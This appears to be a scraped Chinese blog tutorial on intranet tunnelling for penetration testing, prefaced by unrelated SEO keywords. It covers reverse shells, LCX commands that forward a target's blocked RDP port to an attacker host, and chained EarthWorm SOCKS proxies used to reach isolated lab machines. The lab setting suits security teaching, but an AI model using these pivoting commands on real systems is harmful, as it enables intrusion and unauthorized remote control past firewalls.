苏州营销网站建设公司哪家好,手机版网站开发实例,深圳seo优化方案,百度关键词优化平台隧道技术基础基本概念端口转发应用层代理基本概念
攻击者通过边界主机进入内网#xff0c;往往会利用它当跳板进行横向渗透#xff0c;但现在的内部网络大多部署了很多安全设备#xff0c;网络结构错综复杂#xff0c;对于某些系统的访问会受到各种阻挠#xff0c;这就需…
隧道技术基础基本概念端口转发应用层代理基本概念
攻击者通过边界主机进入内网往往会利用它当跳板进行横向渗透但现在的内部网络大多部署了很多安全设备网络结构错综复杂对于某些系统的访问会受到各种阻挠这就需要借助代理去突破这些限制
端口转发 端口转发有时被称为隧道是安全壳(SSH)为网络安全通信使用的一种方法。若攻克的边界主机可访问外网可以使用端口转发进行内网穿透端口转发就是将一个端口转发到另一个端口端口映射 端口映射是NAT的一种功能是把在公网的地址转成私有地址。端口映射就是将一个端口映射到另一个端口供人使用协议隧道 当我们搭建隧道时通常使用不同的协议来躲避检测常见的有HTTP隧道、SOCKS隧道、DNS隧道、ICMP隧道、SSH隧道等 HTTP隧道用的是HTTP协议工作在应用层主要用来代理浏览器访问网页 Socks隧道用的是Socks协议工作在会话层主要用来传递数据包。Socks隧道又分为Socks4和Socks5Socks4只支持TCPSocks5支持TCP和UDP反弹Shell 反弹Shell是指在攻击机监听某个端口然后通过目标连接攻击机监听的端口在攻击机反弹得到目标机的 Shell。通常在目标网络有防火墙或其他因素限制导致无法持续控制目标或执行命令受阻等情况时需要进行反弹Shell。常见的反弹shell方式为Bash反弹shell、NC反弹shell、python反弹shell等正向和反向连接 正向和反向连接的概念取决于谁主动连接谁。攻击者主动连接受害者就是正向连接受害者主动连接攻击者就是反向连接
端口转发
LCX是端口转发工具分为Windows版和Linux版Linux版本为PortMap。LCX有端口映射和端口转发两大功能例如当目标的3389端口只对内开放而不对外开放时可以使用端口映射将3389端口映射到目标的其他端口使用当目标处于内网或目标配置的策略只允许访问固定某一端口时可以通过端口转发突破限制 攻击机 Lcx.exe -listen 监听slave请求的端口 连接的端口 靶机Lcx.exe -slave 攻击机ip 监听端口 目标ip 目标端口 环境准备 靶机win2008IP192.168.137.20开启远程桌面 防火墙取消远程桌面勾选禁止3389端口通信 攻击机IP192.168.199.166运行LCX开启监听slave的666端口将666收到的流量转给本机的888端口 将LCX上传至靶机将靶机本地的3389端口转发到攻击机的666端口 成功建立连接后攻击机远程连接本地888端口即可远程控制靶机
应用层代理 常见的代理工具有regeorgFRPEWNPSTermite通过上述的代理配合代理客户端实现内网漫游 EW全称叫做EarthWorm具有SOCKS5服务架设和端口转发两大核心功能并且包含着LCX工具的功能可以再复杂的网络环境实现网络穿透。EW可以已正向和反向以及多级级联的方式建立网络隧道
环境准备 攻击机win10可与靶机1互通无法访问靶机2和靶机3 靶机1win7双网卡可与攻击机和靶机2互通 靶机2win7双网卡与靶机1和靶机3互通且不出网 靶机3win2008与靶机2互通且不出网IP172.10.10.120多级正向代理 靶机1架设socks代理端口999ew -s ssocksd -l 999 攻击机添加代理服务器靶机1 攻击机成功走靶机1代理流量可访问靶机2开放的web服务 靶机2架设socks代理端口888ew -s ssocksd -l 888 攻击机添加代理服务器靶机2 创建代理链先经过靶机1代理再经过靶机2代理 选中刚才创建的代理链使用 攻击机可成功访问靶机3的web服务
